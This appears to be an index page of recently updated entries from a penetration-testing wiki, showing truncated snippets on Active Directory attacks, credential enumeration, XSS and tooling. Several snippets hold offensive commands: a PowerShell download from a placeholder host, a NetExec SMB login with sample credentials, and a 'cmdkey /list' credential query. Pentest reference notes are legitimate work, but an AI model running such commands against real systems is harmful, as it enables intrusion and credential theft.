Recently Updated Pages

PowerShell .NET Reflection [System.Net.WebClient]::new().DownLoadFile('http://somesite.com/file...

Fingerprinting Domain Controllers PORT STATE SERVICE 53/tcp open domain 88/tcp open...

Assuming you have some means of reading server-side files, these are some examples of places you ...

[10.6.6.0/24] [10.9.9.0/24] [10.80.80.0/24] ...

NetExec nxc smb DC01.domain.tld -d 'domain.tld' -u 'username' -p 'P@$$word123!' -k Use a user...

When to Use You'll know when you've found a domain controller, because it will have several port...

function getUserInput () { if [ $# -gt 1 ] ; then echo "Usage example: $0" ...

Find WordPress NSE Scripts find /usr/share/nmap/scripts -name '*wordpress*' Enumerate WordPre...

Selecting JSON Properties Property Name Contains Dashes { "first-name": "john", "last-nam...

Overview The attacker uses a known username and password of a user on a domain. A typical Kerbe...

Official Documentation https://fleetdm.com/docs/deploy/reference-architectures#infrastructur...

Virtual Environments sudo apt install -y pipx pipx install zkg echo 'export PATH=$PATH:/opt/ze...

Considerations I urge you to consider taking a snapshot of your Kali instance at its current sta...

Stored / Hosted XSS If there is a vulnerability where you can store or submit HTML and have it r...

Linux Host Connecting to Windows Host Users may be able to get WSMan remoting to work using th...

Cracking PFX Archives A .pfx archive is a way to bundle the certificate, key, and metadata in on...

Use Case In this scenario the following is true: You have an Ansible server in AWS You have ...

$searchPath = 'C:\Program Files' $userName = 'john.doe' Get-ChildItem -ErrorAction 'SilentlyCon...

RunasCs.exe Project GitHub https://github.com/antonioCoco/RunasCs/releases Example Usage Spaw...

Credential Enumeration cmdkey /list In reverse shells, I have noticed that it's impossible to s...